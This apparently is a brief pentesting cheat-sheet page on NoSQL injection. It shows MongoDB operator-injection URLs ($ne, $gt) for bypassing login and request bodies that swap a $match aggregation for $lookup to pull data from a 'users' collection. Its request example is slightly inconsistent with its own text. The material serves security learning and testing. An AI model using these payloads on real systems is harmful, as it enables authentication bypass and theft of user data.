NoSQL Injection
Last modified: 2023-03-26
NoSQL Injection is derived from SQL Injection. It affects NoSQL database such as MongoDB, Apache Cassandra.
Manual Injection
MongoDB
If the web application uses MongDB, you might be able to fetch the user's information.
It allows you to bypass authentication.
https://vulnerable.com/search?username=admin&password[$ne]=xyz
https://vulnerable.com/search?username[$ne]=admin&role=guest
https://vulnerable.com/search?id[$gt]=1&username=mike
Retrieve Another Document (MongoDB)
If the website uses MongoDB and uses $match
aggregation to fetch documents, we can change the aggregation to $lookup
for joining another document and get desired information from the document.
First, check if the $match
operator is used in the website.
POST /products HTTP/1.1
...
{
"$match": {
"sold": false
}
}
As above, the website uses $match
aggregator to fetch data from the "products" document, so we can change this as the following.
Assume both the "products" and "users" document have an "id" field.
POST /users HTTP/1.1
...
{
"$lookup": {
"from": "users",
"localField": "id",
"foreignField": "id",
"as": "test"
}
}
Then send this request. We can retrieve values in the "users" document.